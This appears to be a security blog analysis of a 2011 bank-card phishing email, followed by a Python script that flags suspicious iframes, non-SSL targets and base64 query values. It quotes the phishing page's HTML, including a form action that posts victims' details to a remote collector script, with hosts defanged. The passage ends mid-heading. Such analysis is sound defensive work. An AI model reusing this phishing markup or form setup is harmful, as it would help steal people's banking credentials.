Phishing: Urgent – Your bank card has been blocked

A user has reported a suspicious email to us:



Received: from ( [])
Received: from www-data by with local (Exim 4.69)
Subject: URGENT - Your bank card has been blocked
From: Banking Service < >
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: www-data <>

The clickable link “Access to your form” redirects to a new (suspicious) URL:

hxxp:// tf/


URLVoid report:

Report 2011-04-07 16:38:44 (GMT 1)
Domain Hash 91fa19172a89f4c10b8dc0ca8b0460ec
IP Address
IP Hostname
IP Country DE (Germany)
AS Number 24940
AS Name HETZNER-AS Hetzner Online AG RZ
Detections 2 / 22 (9 %)

Analyzing the URL content, we can see suspicious code:

<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script language="JavaScript" src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="hxxp://" frameborder="0" width="486px" height="60px" ></iframe>
<iframe src="hxxp://" name="fid1" id="fid1" width="100%" height="100%" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<a href="">service verified by visa</a>

Why suspicious?

1) The page title looks like a scam.
2) Why is the CSS stylesheet located in the directory “/zzz/css.css”?
3) Why is the (apparent) Google Analytics code located in the directory “/zzz/gas.js”?
4) Why is there an iframe pointing to adboost. com/index6.php?
5) Why is there another iframe pointing to the (long URL) krystalweb. co. uk?
6) Where is SSL?

The long URL:

hxxp:// uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php

This URL loads the fake form in which a user is asked to enter their details. The form then sends (POST) those details to another script located at yet another (suspicious) URL:

action="hxxp:// br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method=post>
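The checks listed above (off-site iframes, the missing SSL, the off-site form action, and the base64 value in the init.php "D=" parameter) can be automated for triage of a reported page. The script below is an added example, not part of the original write-up; the sample markup is constructed from the snippet above, with the third-party hosts replaced by labelled ".example" placeholders.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample modelled on the markup quoted above; the third-party
# hosts are placeholders (.example), not the real ones.
PAGE_HOST = "phish-page.example"
SAMPLE_HTML = """
<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="http://adboost.example/index6.php" frameborder="0"></iframe>
<iframe src="http://krystalweb.example/suuport/5454SDF8541/update.php" name="fid1"></iframe>
<form action="http://collector.example/cgi-bin/HiTman2.php" method=post>
"""

# Tags whose src/action attribute decides where content or data goes.
ATTR_RE = re.compile(r'<(iframe|script|form)\b[^>]*?\b(src|action)="([^"]+)"', re.I)


def decode_b64_query(url):
    """Return {param: text} for query values that are valid base64 and decode
    to printable ASCII (a common way to carry a target host in a URL)."""
    found = {}
    for name, values in parse_qs(urlparse(url).query).items():
        for value in values:
            try:
                text = base64.b64decode(value, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if text and text.isprintable():
                found[name] = text
    return found


def triage(html, page_host):
    """Flag the indicators the write-up above reasons about."""
    findings = []
    for tag, attr, url in ATTR_RE.findall(html):
        parsed = urlparse(url)
        if parsed.scheme == "http":  # no SSL on the resource or form target
            findings.append(f"{tag} {attr} uses plain HTTP: {url}")
        if parsed.netloc and parsed.netloc != page_host:  # off-site content
            findings.append(f"{tag} {attr} points off-site to {parsed.netloc}")
        for name, text in decode_b64_query(url).items():
            findings.append(f"{tag} {attr} param {name} base64-decodes to '{text}'")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_HTML, PAGE_HOST):
        print(line)
```

On the sample it reports the HTTP-only iframes and form action, each off-site host, and that the "D=" parameter decodes to a hostname.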

URLVoid analysis: